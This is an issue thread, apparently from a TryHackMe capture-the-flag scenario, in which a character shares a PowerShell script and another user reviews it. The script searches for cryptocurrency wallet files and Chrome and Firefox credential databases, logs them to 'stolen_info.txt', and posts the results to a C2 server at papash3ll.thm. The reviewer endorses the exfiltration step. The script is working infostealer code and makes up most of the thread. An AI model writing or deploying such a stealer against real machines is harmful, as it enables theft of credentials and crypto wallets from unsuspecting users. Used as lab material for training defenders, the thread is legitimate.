Open MM-WarevilleTHM opened 3 weeks ago
Hey MM, Thanks for the shoutout. Haha, I totally get it! Pointers and memory management can feel like trying to defuse a bomb with a toothpick.
I’m guessing it’s the file searching and C2 communication that’s got you sweating. Share your code, and we'll see what we have.
Exactly! The part where it’s checking for wallet files and credential files is straightforward, but I’m not sure how PowerShell handles things like sending data to a server.
This is what I’ve got currently and did away with the malloc and free in PowerShell (thank goodness).
function Print-AsciiArt {
Write-Host " ____ _ ___ _____ ___ _ _ "
Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
Write-Host "| | _ | | | | | | | | | |_| |"
Write-Host "| |_| | | |___ | | | | | |__ | _ |"
Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
Write-Host " Created by the one and only M.M."
}
# Call the function to print the ASCII art
Print-AsciiArt
# Path for the info file
$infoFilePath = "stolen_info.txt"
# Function to search for wallet files
function Search-ForWallets {
$walletPaths = @(
"$env:USERPROFILE\.bitcoin\wallet.dat",
"$env:USERPROFILE\.ethereum\keystore\*",
"$env:USERPROFILE\.monero\wallet",
"$env:USERPROFILE\.dogecoin\wallet.dat"
)
Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
foreach ($path in $walletPaths) {
if (Test-Path $path) {
Add-Content -Path $infoFilePath -Value "Found wallet: $path"
}
}
}
# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
$firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
if (Test-Path $chromePath) {
Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
}
if (Test-Path $firefoxPath) {
Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
}
}
# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
$c2Url = "http://papash3ll.thm/data"
$data = Get-Content -Path $infoFilePath -Raw
# Using Invoke-WebRequest to send data to the C2 server
Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}
# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server
Haha, yes, you’re free from the malloc/free life! PowerShell will take care of memory for you. For sending data to the server, PowerShell’s Invoke-WebRequest is your best friend and looks like you set it up nicely – it’s a lot easier than dealing with cURL’s verbosity.
This script keeps it nice and simple – no need for C++’s struct stat for checking file existence; PowerShell’s Test-Path handles it for you. For sending the data, Invoke-WebRequest makes the C2 part painless.
Also, I like the ASCII art you have included on it. 🙂
Thanks a lot! This would have gone a totally different way when I was thinking of writing a PowerShell script with malloc – I was about to go full C++-PowerShell hybrid and possibly break the universe.
The ASCII was just a touch of flair 😉
Hey Bloatware,
I came across this pretty cool C++ script of yours and would like to use it for Wareville. My only issue is that I'm not too good with C++ and I don’t really vibe. I’m much more comfortable with PowerShell.
The code does some interesting things, like searching for wallet and browser credential files and sending the findings to a C2 server. I’d love to cross-check my PowerShell version of this, especially since my C++ skills are about as sharp as a butter knife these days.
Appreciate any guidance! Please save me from pointer madness 😅.